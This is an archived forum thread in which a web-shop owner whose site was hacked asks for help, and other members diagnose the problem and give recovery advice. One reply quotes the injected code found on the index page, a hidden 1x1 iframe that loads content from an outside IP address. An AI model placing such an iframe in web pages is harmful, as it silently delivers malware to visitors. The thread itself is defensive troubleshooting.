sjnewbie Posted February 24, 2010 Share Posted February 24, 2010 Hi Guys, I've got customers who said Trojan/Virus Alert automatically came up when they browsed my website. Some customers said my 'Contact Us' bounced back when they filled in the enquiry. Can any of you guys check this out for me? I've got my website hacked a while ago and have implimented most security stuff that I could manage to do myself. I thought that was enough cos I didn't notice any problem on my end. My website is on here. Thanks for your time and advice in advance! Link to comment Share on other sites More sharing options...
germ Posted February 24, 2010 Share Posted February 24, 2010 In the source code of the index page: <iframe src="http://91.201.28.6/goods/index.php" width="1" height="1" frameborder="0"></iframe> I'd say you're still in a "state of hack". :'( If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
sjnewbie Posted February 24, 2010 Author Share Posted February 24, 2010 Oh dear, any particular advice? Do you reckon I've missed out a few things last time I tried to sort it or is that the new hacking? Spent so much time on that and can't believe I had to go through again! I don't even remember what I've done last time except it involved a coupe of all nighters. Any suggestion as to where to start please? :sweating: Link to comment Share on other sites More sharing options...
germ Posted February 24, 2010 Share Posted February 24, 2010 Oh dear, any particular advice? Do you reckon I've missed out a few things last time I tried to sort it or is that the new hacking? Spent so much time on that and can't believe I had to go through again! I don't even remember what I've done last time except it involved a coupe of all nighters. Any suggestion as to where to start please? :sweating: How to Secure Your Site If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
spooks Posted February 24, 2010 Share Posted February 24, 2010 Remember hackers often leave hidden files/back doors etc so even if you remove the obvious & close the hole they used first, they can still get back in. Your best bet after any hack is to get host to wipe site & restore with your clean backup, then add security b4 going back live. If you have no clean backups you may have to resort to going back to your original files. Unfortunatly too many ignore the rule ALWAYS KEEP BACKUPs, and regret that only when its too late. Sam Remember, What you think I ment may not be what I thought I ment when I said it. Contributions: Auto Backup your Database, Easy way Multi Images with Fancy Pop-ups, Easy way Products in columns with multi buy etc etc Disable any Category or Product, Easy way Secure & Improve your account pages et al. Link to comment Share on other sites More sharing options...
sjnewbie Posted February 24, 2010 Author Share Posted February 24, 2010 Thanks! I've gone through most in that thread last time. I've done the search and learnt that I need to remove the line you picked up from all my php files. Is there an easier way of spotting them throughout all my files or going through each php file one by one is the only option? Link to comment Share on other sites More sharing options...
sjnewbie Posted February 24, 2010 Author Share Posted February 24, 2010 I see.. I've done the regular back up but the thing is I don't know how far I need to go back. Don't know exactly when the website was hacked so which back up I have is a clean one to use. Starting from scratch is just not imaginable. Did learn and implimented many contributions. Can't even remember how to do them again so have to learn them all over again. Time is not in my favour at the moment :( Link to comment Share on other sites More sharing options...
sjnewbie Posted February 24, 2010 Author Share Posted February 24, 2010 I just feel it would be much faster to try and get rid of files. Is it impossible to spot hidden files/back doors? Link to comment Share on other sites More sharing options...
spooks Posted February 24, 2010 Share Posted February 24, 2010 I just feel it would be much faster to try and get rid of files. Is it impossible to spot hidden files/back doors? Possibly the easyest way to spot hacked files is with ftp, use that to compare last changed date on your local files with the server version, if there is a varience then examine the suspect file. If you read through the thread on the base64 attack, that refers to a util to search your files for a paticular bit of code. But remember my warning on hidden files/folders or even some you won't be able to delete!! Sam Remember, What you think I ment may not be what I thought I ment when I said it. Contributions: Auto Backup your Database, Easy way Multi Images with Fancy Pop-ups, Easy way Products in columns with multi buy etc etc Disable any Category or Product, Easy way Secure & Improve your account pages et al. Link to comment Share on other sites More sharing options...
sjnewbie Posted February 24, 2010 Author Share Posted February 24, 2010 Okay thank you very much! I will focus on the obvious ones for now - one at a time. Hopefully, will spend time and make over at some point. Just hate to think it may affect my customers in any negative way - their email, ID and password being mis-used or such. Hope this is not the case. Would you be able to confirm that there is no more Trojan/Virus Pop up Warning since I removed the code when you browse the website? Link to comment Share on other sites More sharing options...
spooks Posted February 24, 2010 Share Posted February 24, 2010 Would you be able to confirm that there is no more Trojan/Virus Pop up Warning since I removed the code when you browse the website? Rather than ask ask others to risk infection with your virus, you should check that your self. backup your site with Backup of all store files in zip format http://addons.oscommerce.com/info/6986 or similar, then scan the uploaded file, if your pc AV software aint up to it, use one of the many online services. Sam Remember, What you think I ment may not be what I thought I ment when I said it. Contributions: Auto Backup your Database, Easy way Multi Images with Fancy Pop-ups, Easy way Products in columns with multi buy etc etc Disable any Category or Product, Easy way Secure & Improve your account pages et al. Link to comment Share on other sites More sharing options...
sjnewbie Posted February 24, 2010 Author Share Posted February 24, 2010 I was actually concerned about risking others but assumed they would have a necessary software to block it :blush: Thanks again for all your help. Much appreciated! :thumbsup: Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.